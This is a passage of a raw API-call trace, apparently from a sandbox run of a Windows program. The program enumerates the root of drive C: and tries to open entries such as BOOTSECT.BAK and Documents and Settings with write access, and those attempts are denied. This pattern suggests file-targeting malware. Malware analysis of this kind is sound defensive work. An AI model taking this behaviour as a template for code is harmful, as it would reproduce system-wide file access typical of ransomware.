(HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0071.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0071.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0071.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0071.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0071.115] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.115] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.115] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.115] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0071.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.115] AreFileApisANSI () returned 1 [0071.115] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\BOOTSECT.BAK", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\BOOTSECT.BAK", lpUsedDefaultChar=0x0) returned 16 [0071.115] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.115] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cce0 [0071.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0071.115] AreFileApisANSI () returned 1 [0071.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 16 [0071.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x885b8, cchWideChar=16 | out: lpWideCharStr="C:\\BOOTSECT.BAK") returned 16 [0071.115] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x40c [0071.115] GetFileType (hFile=0x40c) returned 0x1 [0071.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.116] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0071.116] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0071.116] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0071.116] CloseHandle (hObject=0x40c) returned 1 [0071.116] AreFileApisANSI () returned 1 [0071.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 16 [0071.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x885b8, cchWideChar=16 | out: lpWideCharStr="C:\\BOOTSECT.BAK") returned 16 [0071.116] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.116] GetLastError () returned 0x5 [0071.116] GetLastError () returned 0x5 [0071.117] SetLastError (dwErrCode=0x5) [0071.117] GetLastError () returned 0x5 [0071.117] SetLastError (dwErrCode=0x5) [0071.117] GetLastError () returned 0x5 [0071.117] SetLastError (dwErrCode=0x5) [0071.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0071.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cce0 | out: hHeap=0x20000) returned 1 [0071.117] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.117] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.117] FindNextFileW (in: hFindFile=0x78dd0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x77892bc0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0071.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0071.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0071.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0071.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0071.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0071.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0071.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0071.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0071.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0071.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0071.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cce0 [0071.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f5c8 [0071.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cce0 | out: hHeap=0x20000) returned 1 [0071.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f5c8 | out: hHeap=0x20000) returned 1 [0071.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0071.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0071.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0071.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0071.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0071.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0071.118] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.118] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.118] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.118] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0071.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0071.118] AreFileApisANSI () returned 1 [0071.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Documents and Settings", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Documents and Settings", lpUsedDefaultChar=0x0) returned 26 [0071.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.118] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.279] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cce0 [0071.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0071.279] AreFileApisANSI () returned 1 [0071.279] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 26 [0071.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x34) returned 0x78e50 [0071.279] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x78e50, cchWideChar=26 | out: lpWideCharStr="C:\\Documents and Settings") returned 26 [0071.279] CreateFileW (lpFileName="C:\\Documents and Settings" (normalized: "c:\\documents and settings"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.280] GetLastError () returned 0x5 [0071.280] GetLastError () returned 0x5 [0071.280] SetLastError (dwErrCode=0x5) [0071.280] GetLastError () returned 0x5 [0071.280] SetLastError (dwErrCode=0x5) [0071.280] GetLastError () returned 0x5 [0071.280] SetLastError (dwErrCode=0x5) [0071.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78e50 | out: hHeap=0x20000) returned 1 [0071.280] AreFileApisANSI () returned 1 [0071.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 26 [0071.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x34) returned 0x78e50 [0071.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x78e50, cchWideChar=26 | out: lpWideCharStr="C:\\Documents and Settings") returned 26 [0071.280] CreateFileW (lpFileName="C:\\Documents and Settings" (normalized: "c:\\documents and settings"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.280] GetLastError () returned 0x5 [0071.280] GetLastError () returned 0x5 [0071.280] SetLastError (dwErrCode=0x5) [0071.280] GetLastError () returned 0x5 [0071.280] SetLastError (dwErrCode=0x5) [0071.280] GetLastError () returned 0x5 [0071.280] SetLastError (dwErrCode=0x5) [0071.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78e50 | out: hHeap=0x20000) returned 1 [0071.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0071.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cce0 | out: hHeap=0x20000) returned 1 [0071.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.280] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.281] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.281] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.281] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0071.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0071.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0071.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0071.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0071.281] FindNextFileW (in: hFindFile=0x78dd0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ESD", cAlternateFileName="")) returned 1 [0071.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cce0 [0071.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f5c8 [0071.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0071.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0071.281] FindFirstFileExW (in: lpFileName="C:\\Documents and Settings\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0xffffffff [0071.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0071.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0071.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45f68 [0071.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0071.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0071.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0071.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0071.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0071.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0071.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0071.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cce0 | out: hHeap=0x20000) returned 1 [0071.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f5c8 | out: hHeap=0x20000) returned 1 [0071.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45f68 | out: hHeap=0x20000) returned 1 [0071.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cce0 [0071.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f5c8 [0071.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cce0 | out: hHeap=0x20000) returned 1 [0071.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f5c8 | out: hHeap=0x20000) returned 1 [0071.282] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.282] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.282] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.282] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.282] AreFileApisANSI () returned 1 [0071.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ESD", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ESD", lpUsedDefaultChar=0x0) returned 7 [0071.282] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.283] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cce0 [0071.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0071.283] AreFileApisANSI () returned 1 [0071.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0071.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe) returned 0x7d750 [0071.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x7d750, cchWideChar=7 | out: lpWideCharStr="C:\\ESD") returned 7 [0071.283] CreateFileW (lpFileName="C:\\ESD" (normalized: "c:\\esd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.283] GetLastError () returned 0x5 [0071.283] GetLastError () returned 0x5 [0071.283] SetLastError (dwErrCode=0x5) [0071.283] GetLastError () returned 0x5 [0071.283] SetLastError (dwErrCode=0x5) [0071.283] GetLastError () returned 0x5 [0071.283] SetLastError (dwErrCode=0x5) [0071.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d750 | out: hHeap=0x20000) returned 1 [0071.283] AreFileApisANSI () returned 1 [0071.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0071.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe) returned 0x7d798 [0071.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x7d798, cchWideChar=7 | out: lpWideCharStr="C:\\ESD") returned 7 [0071.283] CreateFileW (lpFileName="C:\\ESD" (normalized: "c:\\esd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.284] GetLastError () returned 0x5 [0071.284] GetLastError () returned 0x5 [0071.284] SetLastError (dwErrCode=0x5) [0071.284] GetLastError () returned 0x5 [0071.284] SetLastError (dwErrCode=0x5) [0071.284] GetLastError () returned 0x5 [0071.284] SetLastError (dwErrCode=0x5) [0071.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d798 | out: hHeap=0x20000) returned 1 [0071.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0071.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cce0 | out: hHeap=0x20000) returned 1 [0071.284] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.284] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.284] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.284] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.284] FindNextFileW (in: hFindFile=0x78dd0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x7ef2dddf, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x7ef2dddf, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x174ff10, ftLastWriteTime.dwHighDateTime=0x1d5d816, nFileSizeHigh=0x0, nFileSizeLow=0x332fe000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0071.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0071.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0071.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0071.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0071.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0071.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0071.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0071.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0071.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cce0 [0071.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f5c8 [0071.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.284] FindFirstFileExW (in: lpFileName="C:\\ESD\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78e50 [0071.288] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.288] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0071.288] FindClose (in: hFindFile=0x78e50 | out: hFindFile=0x78e50) returned 1 [0071.288] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46ac8 [0071.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0071.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0071.288] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0071.288] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0071.288] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cce0 | out: hHeap=0x20000) returned 1 [0071.288] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f5c8 | out: hHeap=0x20000) returned 1 [0071.288] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ac8 | out: hHeap=0x20000) returned 1 [0071.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cce0 [0071.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f5c8 [0071.288] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cce0 | out: hHeap=0x20000) returned 1 [0071.288] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f5c8 | out: hHeap=0x20000) returned 1 [0071.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 